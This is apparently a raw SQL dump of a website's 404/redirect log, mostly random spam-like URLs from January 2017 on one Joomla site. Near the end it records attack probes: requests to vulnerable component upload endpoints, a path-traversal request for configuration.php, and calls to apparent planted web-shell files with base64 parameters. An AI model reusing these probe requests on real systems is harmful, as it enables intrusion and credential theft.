00:00:00'),(5725,'http://www.hallcrestheights.org/jgletkym-drqzn/i20162636-k24530-rvmlkswa-zvkecqq-neei-aqjzl.htm',NULL,'','',1,0,'2017-01-17 13:32:34','0000-00-00 00:00:00'),(5726,'http://www.hallcrestheights.org/ryvhrhmq-tyysl/i20162636-k45230-lgeajanp-dmefnxh-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-17 13:35:22','0000-00-00 00:00:00'),(5727,'http://www.hallcrestheights.org/ryvhr-i20162633-hmqt-yysl/lgeajanp-dmefnxhq-k18814-fhjdyh-aoxrc.htm',NULL,'','',1,0,'2017-01-17 13:38:10','0000-00-00 00:00:00'),(5728,'http://www.hallcrestheights.org/i20162632-k60214-ixnmu-eahw-hioz/hjxbnwpg-eyooayik-uksszq-cebaq.htm',NULL,'','',2,0,'2017-01-17 13:40:58','0000-00-00 00:00:00'),(5729,'http://www.hallcrestheights.org/k24430-ryvhrhmq-tyysl-lgeajanp/dmefnxh-i20162636-qfhj-dyhao-xrcjhw.htm',NULL,'','',1,0,'2017-01-17 13:43:46','0000-00-00 00:00:00'),(5730,'http://www.hallcrestheights.org/lugdltrs-k45130-mxxhy-pzqjllzo/hnjumnt-i20162636-ecwf-ogywb-iwyrur.htm',NULL,'','',1,0,'2017-01-17 13:46:34','0000-00-00 00:00:00'),(5731,'http://www.hallcrestheights.org/mrcqg-i20162633-beif-uwgr/abtnwyrq-semgwkow-hmemxg-k18414-kucyb-npzkic.htm',NULL,'','',1,0,'2017-01-17 13:49:22','0000-00-00 00:00:00'),(5732,'http://www.hallcrestheights.org/i20162632-upttm-nbea-k60714-tgrb/nqcdcncx-rdhcpgzz-dllimv-yxjlt-feobke.htm',NULL,'','',1,0,'2017-01-17 13:52:10','0000-00-00 00:00:00'),(5733,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde/cwxbdeu-i20162636-dkov-fiibp-k45630-tquhzx-chhr.htm',NULL,'','',1,0,'2017-01-17 13:54:59','0000-00-00 00:00:00'),(5734,'http://www.hallcrestheights.org/dvisciwb-vwkux-k24930-krbzomsm/vuclzup-i20162636-hvqa-wuoxz-mnpzvs-gcrl.htm',NULL,'','',1,0,'2017-01-17 13:57:46','0000-00-00 00:00:00'),(5735,'http://www.hallcrestheights.org/edzvd-k18514-lqco-mnnm-mcawvbfu/japyvrlf-i20162633-lxhqjk-uhkcm-umbhmg-znkoh.htm',NULL,'','',1,0,'2017-01-17 14:00:35','0000-00-00 00:00:00'),(5736,'http://www.hallcrestheights.org/zmkue-k59914-dtzj-ivyo-qxifgxuh/i20162632-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi.htm',NULL,'','',1,0,'2017-01-17 14:03:23','0000-00-00 00:00:00'),(5737,'http://www.hallcrestheights.org/gnfznxvj-k25030-xpalt-itjshkyj-yldpija/amdu-rtaen-pggwtd-vlxt-i20162636-dqkunfgl.htm',NULL,'','',1,0,'2017-01-17 14:06:10','0000-00-00 00:00:00'),(5738,'http://www.hallcrestheights.org/dvisciwb-k45730-vwkux-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-gcrl-i20162636-ycmczoqq.htm',NULL,'','',1,0,'2017-01-17 14:08:58','0000-00-00 00:00:00'),(5739,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-i20162633-itjshkyj/k18114-yldpijaa-mdurta-enpgg-wtdvlx-tdqku-nfglqrh.htm',NULL,'','',1,0,'2017-01-17 14:11:47','0000-00-00 00:00:00'),(5740,'http://www.hallcrestheights.org/ryvhr-hmqt-i20162632-yysl-lgeajanp/k60414-dmefnxhq-fhjdyh-aoxrc-jhwuvd-svezy-twlcycw.htm',NULL,'','',1,0,'2017-01-17 14:14:35','0000-00-00 00:00:00'),(5741,'http://www.hallcrestheights.org/k24630-pcscqruf-unpkw-xpoideot-wtvsoar/mosm-gepla-i20162636-lheliy-rqiy-qfufxvug-owopegtq.htm',NULL,'','',1,0,'2017-01-17 14:17:22','0000-00-00 00:00:00'),(5742,'http://www.hallcrestheights.org/k45330-jgletkym-drqzn-rvmlkswa-zvkecqq/neei-aqjzl-i20162636-nplqfc-nebx-ilnvoxbd-jveebikp.htm',NULL,'','',1,0,'2017-01-17 14:22:59','0000-00-00 00:00:00'),(5743,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-mcawvbfu/japyvrlf-lxhqjk-i20162632-uhkcm-umbhmg-znkoh-eyrupxp-k60114-udzikmu.htm',NULL,'','',1,0,'2017-01-17 14:28:35','0000-00-00 00:00:00'),(5744,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-k18714-pzqjllzo/hnjumnte-cwfogy-wbiwy-i20162633-rurfgv-fcwqz-hribnkn-yfeebsb.htm',NULL,'','',1,0,'2017-01-17 14:31:22','0000-00-00 00:00:00'),(5745,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv/lbtr-k45930-hnnmt-qzkowt-sxpp-bgrrcdsi-kibkxnpf-i20162636-ovpyay.htm',NULL,'','',1,0,'2017-01-17 14:34:11','0000-00-00 00:00:00'),(5746,'http://www.hallcrestheights.org/mrcqg-beif-k60014-uwgr-abtnwyrq/i20162632-semgwkow-hmemxg-kucyb-npzkic-vejxk-ulzjcjk-ntsxjln-uuuv.htm',NULL,'','',1,0,'2017-01-17 14:36:58','0000-00-00 00:00:00'),(5747,'http://www.hallcrestheights.org/ixnmu-eahw-k18614-hioz-hjxbnwpg/eyooayik-i20162633-uksszq-cebaq-domytn-iholb-dentafy-mluzext-lfgg.htm',NULL,'','',1,0,'2017-01-17 14:39:46','0000-00-00 00:00:00'),(5748,'http://www.hallcrestheights.org/ixnmueah-whioz-k24230-hjxbnwpg-eyooayi/kuks-szqce-baqdom-ytni-i20162636-holbdent-afymluze-xtlfgg-csdimr.htm',NULL,'','',1,0,'2017-01-17 14:42:34','0000-00-00 00:00:00'),(5749,'http://www.hallcrestheights.org/gnfznxvj-xpalt-k45830-itjshkyj-yldpija/amdu-rtaen-pggwtd-vlxt-i20162636-dqkunfgl-qrhzyonx-feqnzs-vvbpzw.htm',NULL,'','',1,0,'2017-01-17 14:45:22','0000-00-00 00:00:00'),(5750,'http://www.hallcrestheights.org/ryvhr-i20162633-hmqt/k8414-yysl-lgeajanp.htm',NULL,'','',1,0,'2017-01-17 14:50:58','0000-00-00 00:00:00'),(5751,'http://www.hallcrestheights.org/lugdl-i20162633-trsm/k29114-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-17 14:53:46','0000-00-00 00:00:00'),(5752,'http://www.hallcrestheights.org/i20162636-lugdltrs-mxxhy/k34730-pzqjllzo-hnjumnt.htm',NULL,'','',1,0,'2017-01-17 14:56:35','0000-00-00 00:00:00'),(5753,'http://www.hallcrestheights.org/i20162636-ryvhrhmq-tyysl/k14030-lgeajanp-dmefnxh.htm',NULL,'','',1,0,'2017-01-17 14:59:22','0000-00-00 00:00:00'),(5754,'http://www.hallcrestheights.org/lugdl-trsm/xxhy-i20162633-pzqjllzo-k8314-hnjumnte.htm',NULL,'','',1,0,'2017-01-17 15:02:10','0000-00-00 00:00:00'),(5755,'http://www.hallcrestheights.org/ixnmu-eahw/hioz-i20162633-hjxbnwpg-k29014-eyooayik.htm',NULL,'','',1,0,'2017-01-17 15:04:58','0000-00-00 00:00:00'),(5756,'http://www.hallcrestheights.org/k34630-ixnmueah-i20162636-whioz/hjxbnwpg-eyooayi-kuks.htm',NULL,'','',1,0,'2017-01-17 15:07:46','0000-00-00 00:00:00'),(5757,'http://www.hallcrestheights.org/k13930-lugdltrs-i20162636-mxxhy/pzqjllzo-hnjumnt-ecwf.htm',NULL,'','',1,0,'2017-01-17 15:10:34','0000-00-00 00:00:00'),(5758,'http://www.hallcrestheights.org/edzvd-lqco/k8114-mnnm-mcawvbfu-japyvrlf-i20162633-lxhqjk.htm',NULL,'','',1,0,'2017-01-17 15:13:24','0000-00-00 00:00:00'),(5759,'http://www.hallcrestheights.org/dvisc-iwbv/k29714-wkux-krbzomsm-vuclzuph-i20162633-vqawuo.htm',NULL,'','',1,0,'2017-01-17 15:16:10','0000-00-00 00:00:00'),(5760,'http://www.hallcrestheights.org/mrcqgbei-fuwgr/i20162636-k34430-abtnwyrq-semgwko-whme-mxgku.htm',NULL,'','',1,0,'2017-01-17 15:18:58','0000-00-00 00:00:00'),(5761,'http://www.hallcrestheights.org/mrcqg-i20162633-beif-uwgr/abtnwyrq-semgwkow-hmemxg-k8014-kucyb.htm',NULL,'','',1,0,'2017-01-17 15:21:47','0000-00-00 00:00:00'),(5762,'http://www.hallcrestheights.org/fadla-i20162633-jfnl-gfpc/vwgmyhde-k29614-cwxbdeud-kovfii-bptqu.htm',NULL,'','',1,0,'2017-01-17 15:24:34','0000-00-00 00:00:00'),(5763,'http://www.hallcrestheights.org/zmkuedtz-jivyo-k34330-qxifgxuh/xptvuhm-i20162636-iwnz-korpv-ubfgnq.htm',NULL,'','',1,0,'2017-01-17 15:27:23','0000-00-00 00:00:00'),(5764,'http://www.hallcrestheights.org/mrcqgbei-k13630-fuwgr-abtnwyrq/semgwko-i20162636-whme-mxgku-cybnpz.htm',NULL,'','',1,0,'2017-01-17 15:30:11','0000-00-00 00:00:00'),(5765,'http://www.hallcrestheights.org/jglet-i20162633-kymd-k8514-rqzn/rvmlkswa-zvkecqqn-eeiaqj-zlnpl-qfcneb.htm',NULL,'','',1,0,'2017-01-17 15:32:59','0000-00-00 00:00:00'),(5766,'http://www.hallcrestheights.org/ryvhr-i20162633-hmqt-yysl/lgeajanp-dmefnxhq-fhjdyh-k29214-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-17 15:35:47','0000-00-00 00:00:00'),(5767,'http://www.hallcrestheights.org/jgletkym-drqzn-k14130-rvmlkswa/zvkecqq-i20162636-neei-aqjzl-nplqfc-nebx.htm',NULL,'','',1,0,'2017-01-17 15:38:35','0000-00-00 00:00:00'),(5768,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp/dmefnxh-i20162636-qfhj-dyhao-k34830-xrcjhw-uvds.htm',NULL,'','',1,0,'2017-01-17 15:41:22','0000-00-00 00:00:00'),(5769,'http://www.hallcrestheights.org/pcscq-k8614-rufu-npkw-xpoideot/wtvsoarm-i20162633-osmgep-lalhe-liyrqi-yqfuf.htm',NULL,'','',1,0,'2017-01-17 15:44:11','0000-00-00 00:00:00'),(5770,'http://www.hallcrestheights.org/jglet-k29314-kymd-rqzn-rvmlkswa/zvkecqqn-i20162633-eeiaqj-zlnpl-qfcneb-xilnv.htm',NULL,'','',1,0,'2017-01-17 15:46:59','0000-00-00 00:00:00'),(5771,'http://www.hallcrestheights.org/jgletkym-k34930-drqzn-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-i20162636-ilnvoxbd.htm',NULL,'','',1,0,'2017-01-17 15:49:47','0000-00-00 00:00:00'),(5772,'http://www.hallcrestheights.org/pcscqruf-k14230-unpkw-xpoideot-wtvsoar/mosm-gepla-lheliy-rqiy-i20162636-qfufxvug.htm',NULL,'','',1,0,'2017-01-17 15:52:35','0000-00-00 00:00:00'),(5773,'http://www.hallcrestheights.org/ixnmu-eahw-hioz-i20162633-hjxbnwpg/k8214-eyooayik-uksszq-cebaq-domytn-iholb-dentafy.htm',NULL,'','',1,0,'2017-01-17 15:55:23','0000-00-00 00:00:00'),(5774,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-i20162633-mcawvbfu/k28914-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp.htm',NULL,'','',1,0,'2017-01-17 15:58:11','0000-00-00 00:00:00'),(5775,'http://www.hallcrestheights.org/k34530-edzvdlqc-omnnm-mcawvbfu-japyvrl/flxh-qjkuh-i20162636-kcmumb-hmgz-nkoheyru-pxpudzik.htm',NULL,'','',1,0,'2017-01-17 16:00:59','0000-00-00 00:00:00'),(5776,'http://www.hallcrestheights.org/k13830-ixnmueah-whioz-hjxbnwpg-eyooayi/kuks-szqce-i20162636-baqdom-ytni-holbdent-afymluze.htm',NULL,'','',1,0,'2017-01-17 16:03:47','0000-00-00 00:00:00'),(5777,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-k8814-vwgmyhde/cwxbdeud-kovfii-bptqu-i20162633-hzxchh-rmxag-fpapuhg-fqvjdcl.htm',NULL,'','',1,0,'2017-01-17 16:06:34','0000-00-00 00:00:00'),(5778,'http://www.hallcrestheights.org/upttm-k29514-nbea-tgrb-nqcdcncx/rdhcpgzz-dllimv-yxjlt-i20162633-feobke-bwivs-mqkrfbm-lkmstho.htm',NULL,'','',1,0,'2017-01-17 16:09:23','0000-00-00 00:00:00'),(5779,'http://www.hallcrestheights.org/upttm-nbea-k8714-tgrb-nqcdcncx/rdhcpgzz-i20162633-dllimv-yxjlt-feobke-bwivs-mqkrfbm-lkmstho-wgwh.htm',NULL,'','',1,0,'2017-01-17 16:12:13','0000-00-00 00:00:00'),(5780,'http://www.hallcrestheights.org/k13530-zmkuedtz-jivyo-qxifgxuh-xptvuhm/iwnz-korpv-ubfgnq-tpmh-prbikzon-mtlajhol-i20162636-jrdklt.htm',NULL,'','',1,0,'2017-01-17 16:14:58','0000-00-00 00:00:00'),(5781,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde-cwxbdeu/dkov-fiibp-tquhzx-chhr-mxagfpap-k14430-uhgfqvjd-i20162636-clbbvz.htm',NULL,'','',1,0,'2017-01-17 16:17:46','0000-00-00 00:00:00'),(5782,'http://www.hallcrestheights.org/pcscq-rufu-k29414-npkw-xpoideot/wtvsoarm-i20162633-osmgep-lalhe-liyrqi-yqfuf-xvugowo-pegtqam-zimc.htm',NULL,'','',1,0,'2017-01-17 16:20:35','0000-00-00 00:00:00'),(5783,'http://www.hallcrestheights.org/upttmnbe-atgrb-k14330-nqcdcncx-rdhcpgz/zdll-imvyx-jltfeo-bkeb-i20162636-wivsmqkr-fbmlkmst-howgwh-lkjlbm.htm',NULL,'','',1,0,'2017-01-17 16:39:36','0000-00-00 00:00:00'),(5784,'http://www.hallcrestheights.org/vqjnyspv-holjp-k13430-eurrtpil-uourxiv/lbtr-hnnmt-qzkowt-sxpp-i20162636-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',1,0,'2017-01-17 16:55:48','0000-00-00 00:00:00'),(5785,'http://www.hallcrestheights.org/i20162632-ixnmu-eahw/k61514-hioz-hjxbnwpg.htm',NULL,'','',1,0,'2017-01-17 16:59:00','0000-00-00 00:00:00'),(5786,'http://www.hallcrestheights.org/fadla-i20162633-jfnl/k19214-gfpc-vwgmyhde.htm',NULL,'','',1,0,'2017-01-17 17:08:42','0000-00-00 00:00:00'),(5787,'http://www.hallcrestheights.org/upttm-nbea/tgrb-i20162633-nqcdcncx-k19114-rdhcpgzz.htm',NULL,'','',1,0,'2017-01-17 17:11:56','0000-00-00 00:00:00'),(5788,'http://www.hallcrestheights.org/edzvd-lqco/i20162632-mnnm-mcawvbfu-k61414-japyvrlf.htm',NULL,'','',1,0,'2017-01-17 17:18:24','0000-00-00 00:00:00'),(5789,'http://www.hallcrestheights.org/zmkue-dtzj/k61214-ivyo-qxifgxuh-i20162632-xptvuhmi-wnzkor.htm',NULL,'','',1,0,'2017-01-17 17:21:38','0000-00-00 00:00:00'),(5790,'http://www.hallcrestheights.org/edzvd-lqco/k19814-mnnm-mcawvbfu-japyvrlf-i20162633-lxhqjk.htm',NULL,'','',1,0,'2017-01-17 17:24:52','0000-00-00 00:00:00'),(5791,'http://www.hallcrestheights.org/i20162632-vqjny-spvh-oljp/eurrtpil-k61114-uourxivl-btrhnn-mtqzk.htm',NULL,'','',1,0,'2017-01-17 17:28:06','0000-00-00 00:00:00'),(5792,'http://www.hallcrestheights.org/mrcqg-i20162633-beif-k19714-uwgr/abtnwyrq-semgwkow-hmemxg-kucyb.htm',NULL,'','',1,0,'2017-01-17 17:31:20','0000-00-00 00:00:00'),(5793,'http://www.hallcrestheights.org/i20162632-lugdl-trsm-xxhy/pzqjllzo-hnjumnte-cwfogy-k61614-wbiwy-rurfgv.htm',NULL,'','',1,0,'2017-01-17 17:34:33','0000-00-00 00:00:00'),(5794,'http://www.hallcrestheights.org/dvisc-i20162633-iwbv-k19314-wkux/krbzomsm-vuclzuph-vqawuo-xzmnp-zvsgcr.htm',NULL,'','',1,0,'2017-01-17 17:37:47','0000-00-00 00:00:00'),(5795,'http://www.hallcrestheights.org/gnfzn-k19414-xvjx-palt-itjshkyj/yldpijaa-i20162633-mdurta-enpgg-wtdvlx-tdqku.htm',NULL,'','',1,0,'2017-01-17 17:41:02','0000-00-00 00:00:00'),(5796,'http://www.hallcrestheights.org/fadla-k60814-jfnl-gfpc-vwgmyhde/i20162632-cwxbdeud-kovfii-bptqu-hzxchh-rmxag.htm',NULL,'','',1,0,'2017-01-17 17:44:15','0000-00-00 00:00:00'),(5797,'http://www.hallcrestheights.org/pcscq-rufu-npkw-i20162633-xpoideot/k19014-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf-xvugowo.htm',NULL,'','',1,0,'2017-01-17 17:47:30','0000-00-00 00:00:00'),(5798,'http://www.hallcrestheights.org/mrcqg-beif-i20162632-uwgr-abtnwyrq/k61314-semgwkow-hmemxg-kucyb-npzkic-vejxk-ulzjcjk.htm',NULL,'','',1,0,'2017-01-17 17:50:44','0000-00-00 00:00:00'),(5799,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-itjshkyj/yldpijaa-mdurta-i20162632-enpgg-wtdvlx-k61014-tdqku-nfglqrh-zyonxfe.htm',NULL,'','',1,0,'2017-01-17 17:53:58','0000-00-00 00:00:00'),(5800,'http://www.hallcrestheights.org/zmkue-k19614-dtzj-ivyo-qxifgxuh/xptvuhmi-wnzkor-pvubf-i20162633-gnqtpm-hprbi-kzonmtl-ajholjr.htm',NULL,'','',1,0,'2017-01-17 17:57:13','0000-00-00 00:00:00'),(5801,'http://www.hallcrestheights.org/dvisc-iwbv-k60914-wkux-krbzomsm/i20162632-vuclzuph-vqawuo-xzmnp-zvsgcr-lycmc-zoqqelu-dpwcmeg-iapx.htm',NULL,'','',1,0,'2017-01-17 18:00:26','0000-00-00 00:00:00'),(5802,'http://www.hallcrestheights.org/vqjny-spvh-k19514-oljp-eurrtpil/uourxivl-i20162633-btrhnn-mtqzk-owtsxp-pbgrr-cdsikib-kxnpfov-pyay.htm',NULL,'','',1,0,'2017-01-17 18:03:40','0000-00-00 00:00:00'),(5803,'http://www.hallcrestheights.org/mrcqg-i20162633-beif/k9314-uwgr-abtnwyrq.htm',NULL,'','',1,0,'2017-01-17 18:06:54','0000-00-00 00:00:00'),(5804,'http://www.hallcrestheights.org/i20162632-vqjny-spvh/k50714-oljp-eurrtpil.htm',NULL,'','',1,0,'2017-01-17 18:10:09','0000-00-00 00:00:00'),(5805,'http://www.hallcrestheights.org/zmkue-dtzj/ivyo-i20162633-qxifgxuh-k9214-xptvuhmi.htm',NULL,'','',1,0,'2017-01-17 18:13:23','0000-00-00 00:00:00'),(5806,'http://www.hallcrestheights.org/gnfzn-xvjx/i20162632-palt-itjshkyj-k50614-yldpijaa.htm',NULL,'','',1,0,'2017-01-17 18:16:36','0000-00-00 00:00:00'),(5807,'http://www.hallcrestheights.org/gnfzn-xvjx/k9014-palt-itjshkyj-yldpijaa-i20162633-mdurta.htm',NULL,'','',1,0,'2017-01-17 18:19:50','0000-00-00 00:00:00'),(5808,'http://www.hallcrestheights.org/fadla-jfnl/k50414-gfpc-vwgmyhde-i20162632-cwxbdeud-kovfii.htm',NULL,'','',1,0,'2017-01-17 18:23:04','0000-00-00 00:00:00'),(5809,'http://www.hallcrestheights.org/dvisc-i20162633-iwbv-wkux/k8914-krbzomsm-vuclzuph-vqawuo-xzmnp.htm',NULL,'','',1,0,'2017-01-17 18:26:18','0000-00-00 00:00:00'),(5810,'http://www.hallcrestheights.org/i20162632-upttm-nbea-tgrb/nqcdcncx-rdhcpgzz-k50314-dllimv-yxjlt.htm',NULL,'','',2,0,'2017-01-17 18:29:32','0000-00-00 00:00:00'),(5811,'http://www.hallcrestheights.org/i20162632-zmkue-dtzj-ivyo/qxifgxuh-xptvuhmi-wnzkor-k50814-pvubf-gnqtpm.htm',NULL,'','',1,0,'2017-01-17 18:32:46','0000-00-00 00:00:00'),(5812,'http://www.hallcrestheights.org/mrcqg-k50914-beif-uwgr-abtnwyrq/i20162632-semgwkow-hmemxg-kucyb-npzkic-vejxk.htm',NULL,'','',1,0,'2017-01-17 18:36:00','0000-00-00 00:00:00'),(5813,'http://www.hallcrestheights.org/vqjny-spvh-oljp-i20162633-eurrtpil/k9114-uourxivl-btrhnn-mtqzk-owtsxp-pbgrr-cdsikib.htm',NULL,'','',1,0,'2017-01-17 18:39:14','0000-00-00 00:00:00'),(5814,'http://www.hallcrestheights.org/dvisc-iwbv-i20162632-wkux-krbzomsm/k50514-vuclzuph-vqawuo-xzmnp-zvsgcr-lycmc-zoqqelu.htm',NULL,'','',1,0,'2017-01-17 18:42:29','0000-00-00 00:00:00'),(5815,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot/wtvsoarm-osmgep-i20162632-lalhe-liyrqi-yqfuf-xvugowo-k50214-pegtqam.htm',NULL,'','',1,0,'2017-01-17 18:45:42','0000-00-00 00:00:00'),(5816,'http://www.hallcrestheights.org/ixnmu-eahw-hioz-hjxbnwpg/eyooayik-uksszq-i20162632-cebaq-domytn-k51114-iholb-dentafy-mluzext.htm',NULL,'','',1,0,'2017-01-17 18:48:57','0000-00-00 00:00:00'),(5817,'http://www.hallcrestheights.org/jglet-kymd-k50114-rqzn-rvmlkswa/i20162632-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv-oxbdjve-ebikptj-vlxf.htm',NULL,'','',1,0,'2017-01-17 18:52:10','0000-00-00 00:00:00'),(5818,'http://www.hallcrestheights.org/edzvd-lqco-k51014-mnnm-mcawvbfu/i20162632-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp-udzikmu-sshe.htm',NULL,'','',1,0,'2017-01-17 18:58:38','0000-00-00 00:00:00'),(5819,'http://www.hallcrestheights.org/i20162632-lugdl-trsm/k40814-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-17 19:01:52','0000-00-00 00:00:00'),(5820,'http://www.hallcrestheights.org/ixnmu-eahw/i20162632-hioz-hjxbnwpg-k40714-eyooayik.htm',NULL,'','',1,0,'2017-01-17 19:05:06','0000-00-00 00:00:00'),(5821,'http://www.hallcrestheights.org/fadla-jfnl/k62114-gfpc-vwgmyhde-i20162632-cwxbdeud-kovfii.htm',NULL,'','',1,0,'2017-01-17 19:11:34','0000-00-00 00:00:00'),(5822,'http://www.hallcrestheights.org/mrcqg-beif/k40514-uwgr-abtnwyrq-i20162632-semgwkow-hmemxg.htm',NULL,'','',1,0,'2017-01-17 19:14:48','0000-00-00 00:00:00'),(5823,'http://www.hallcrestheights.org/i20162632-upttm-k62014-nbea-tgrb/nqcdcncx-rdhcpgzz-dllimv-yxjlt.htm',NULL,'','',1,0,'2017-01-17 19:21:16','0000-00-00 00:00:00'),(5824,'http://www.hallcrestheights.org/i20162632-zmkue-dtzj-ivyo/k40414-qxifgxuh-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-01-17 19:24:30','0000-00-00 00:00:00'),(5825,'http://www.hallcrestheights.org/i20162632-ryvhr-hmqt-k40914-yysl/lgeajanp-dmefnxhq-fhjdyh-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-17 19:30:58','0000-00-00 00:00:00'),(5826,'http://www.hallcrestheights.org/jglet-k41014-kymd-rqzn-rvmlkswa/i20162632-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv.htm',NULL,'','',1,0,'2017-01-17 19:34:12','0000-00-00 00:00:00'),(5827,'http://www.hallcrestheights.org/ryvhr-k61714-hmqt-yysl-lgeajanp/i20162632-dmefnxhq-fhjdyh-aoxrc-jhwuvd-svezy.htm',NULL,'','',1,0,'2017-01-17 19:37:26','0000-00-00 00:00:00'),(5828,'http://www.hallcrestheights.org/edzvd-lqco-i20162632-mnnm-mcawvbfu/k40614-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp.htm',NULL,'','',1,0,'2017-01-17 19:40:40','0000-00-00 00:00:00'),(5829,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil/uourxivl-btrhnn-i20162632-mtqzk-owtsxp-pbgrr-cdsikib-k40314-kxnpfov.htm',NULL,'','',1,0,'2017-01-17 19:43:54','0000-00-00 00:00:00'),(5830,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx/rdhcpgzz-dllimv-i20162632-yxjlt-feobke-k41214-bwivs-mqkrfbm-lkmstho.htm',NULL,'','',1,0,'2017-01-17 19:47:09','0000-00-00 00:00:00'),(5831,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot/wtvsoarm-osmgep-i20162632-k61914-lalhe-liyrqi-yqfuf-xvugowo-pegtqam.htm',NULL,'','',1,0,'2017-01-17 19:50:22','0000-00-00 00:00:00'),(5832,'http://www.hallcrestheights.org/gnfzn-xvjx-k40214-palt-itjshkyj/i20162632-yldpijaa-mdurta-enpgg-wtdvlx-tdqku-nfglqrh-zyonxfe-qnzs.htm',NULL,'','',1,0,'2017-01-17 19:53:36','0000-00-00 00:00:00'),(5833,'http://www.hallcrestheights.org/jglet-kymd-k61814-rqzn-rvmlkswa/i20162632-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv-oxbdjve-ebikptj-vlxf.htm',NULL,'','',1,0,'2017-01-17 19:56:50','0000-00-00 00:00:00'),(5834,'http://www.hallcrestheights.org/pcscq-rufu-k41114-npkw-xpoideot/i20162632-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf-xvugowo-pegtqam-zimc.htm',NULL,'','',1,0,'2017-01-17 20:00:04','0000-00-00 00:00:00'),(5835,'http://www.hallcrestheights.org/\'',NULL,'http://hasgraphics.com/tag/top-view/','',1,0,'2017-01-18 05:13:33','0000-00-00 00:00:00'),(5836,'http://www.hallcrestheights.org/pdf/green_9.pdf',NULL,'','',8,0,'2017-01-18 11:02:12','0000-00-00 00:00:00'),(5837,'http://www.hallcrestheights.org///index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',4,0,'2017-01-19 05:36:07','0000-00-00 00:00:00'),(5838,'http://www.hallcrestheights.org//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20',NULL,'','',4,0,'2017-01-19 05:36:10','0000-00-00 00:00:00'),(5839,'http://www.hallcrestheights.org//index.php?option=com_myblog&task=ajaxupload',NULL,'','',4,0,'2017-01-19 05:36:13','0000-00-00 00:00:00'),(5840,'http://www.hallcrestheights.org/index.php?option=com_jdownloads&Itemid=0&view=upload',NULL,'','',4,0,'2017-01-19 05:36:14','0000-00-00 00:00:00'),(5841,'http://www.hallcrestheights.org//components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',4,0,'2017-01-19 05:36:14','0000-00-00 00:00:00'),(5842,'http://www.hallcrestheights.org//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',8,0,'2017-01-19 05:36:16','0000-00-00 00:00:00'),(5843,'http://www.hallcrestheights.org/soegszx-k46673-yifet-i20162630-vtndyu-uhvfcy/',NULL,'http://www.google.co.jp/','',5,0,'2017-01-19 11:01:56','0000-00-00 00:00:00'),(5844,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-gefv/bbgzagp-i20162635-eciyyuwu-vfztjigj-k15027-inamzbc-ngtfmlyr-ghdfi/',NULL,'','',1,0,'2017-01-19 11:07:16','0000-00-00 00:00:00'),(5845,'http://www.hallcrestheights.org/useful/choose_desk.html',NULL,'https://search.yahoo.co.jp/','',10,0,'2017-01-19 12:17:59','0000-00-00 00:00:00'),(5846,'http://hallcrestheights.org////index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',2,0,'2017-01-19 15:11:12','0000-00-00 00:00:00'),(5847,'http://hallcrestheights.org///index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20',NULL,'','',2,0,'2017-01-19 15:11:19','0000-00-00 00:00:00'),(5848,'http://hallcrestheights.org///index.php?option=com_myblog&task=ajaxupload',NULL,'','',2,0,'2017-01-19 15:11:27','0000-00-00 00:00:00'),(5849,'http://hallcrestheights.org//index.php?option=com_jdownloads&Itemid=0&view=upload',NULL,'','',3,0,'2017-01-19 15:11:29','0000-00-00 00:00:00'),(5850,'http://hallcrestheights.org///components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',2,0,'2017-01-19 15:11:31','0000-00-00 00:00:00'),(5851,'http://hallcrestheights.org///index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',4,0,'2017-01-19 15:11:32','0000-00-00 00:00:00'),(5852,'http://hallcrestheights.org//images/1ndex.php?z3=Z1RYNkpSLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-01-19 16:01:49','0000-00-00 00:00:00'),(5853,'http://hallcrestheights.org//sqlbak.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:01:51','0000-00-00 00:00:00'),(5854,'http://hallcrestheights.org//email.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 16:01:56','0000-00-00 00:00:00'),(5855,'http://hallcrestheights.org//functions.php?z3=Z1RYNkpSLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-01-19 